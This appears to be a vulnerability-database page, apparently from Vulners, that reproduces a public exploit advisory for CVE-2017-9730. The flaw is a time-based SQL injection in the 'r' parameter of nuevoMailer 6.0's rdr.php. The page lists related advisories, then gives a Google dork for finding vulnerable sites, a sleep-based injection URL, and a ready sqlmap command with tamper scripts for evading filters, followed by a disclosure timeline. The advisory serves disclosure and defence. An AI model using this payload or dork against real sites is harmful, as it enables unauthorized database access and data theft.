| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| nuevoMailer 6.0 - SQL Injection Vulnerability | 19 Jun 201700:00 | – | zdt | |
| nuevoMailer 'r' Parameter SQL Injection Vulnerability | 21 Jun 201700:00 | – | cnvd | |
| CVE-2017-9730 | 19 Jun 201712:00 | – | cve | |
| CVE-2017-9730 | 19 Jun 201712:00 | – | cvelist | |
| EUVD-2017-18661 | 7 Oct 202500:30 | – | euvd | |
| nuevoMailer 6.0 - SQL Injection | 9 Jun 201700:00 | – | exploitpack | |
| CVE-2017-9730 | 19 Jun 201712:29 | – | nvd | |
| CVE-2017-9730 | 19 Jun 201712:29 | – | osv | |
| nuevoMailer 6.0 SQL Injection | 16 Jun 201700:00 | – | packetstorm | |
| Sql injection | 19 Jun 201712:29 | – | prion |
# Exploit Title: nuevoMailer version 6.0 and earlier time-based SQL Injection
# Exploit Author: ALEH BOITSAU
# Google Dork: inurl:/inc/rdr.php?
# Date: 2017-06-09
# Vendor Homepage: https://www.nuevomailer.com/
# Version: 6.0 and earlier
# Tested on: Linux
# CVE: CVE-2017-9730
Description: SQL injection vulnerability in rdr.php in nuevoMailer version 6.0 and earlier
allows remote attackers to execute arbitrary SQL commands via the "r" parameter.
PoC:
https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556[time based SQL INJ]
https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556%20and%20sleep(10)--+
sqlmap -u "http://vulnerable_site.com/inc/rdr.php?r=120c44c5" --dbms=mysql -p r --tamper=equaltolike,between --hostname --technique=T -v 3 --random-agent --time-sec=4
NB: "equaltolike" and "between" arsenal to defeat filtering! Data retrieval process may take more than usual time.
Disclosure Timeline:
2017-06-09: Vendor has been notified
2017-06-09: Vendor responded with intention to fix the vulnerability
2017-06-16: CVE number acquired
2017-06-16: Public disclosureData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation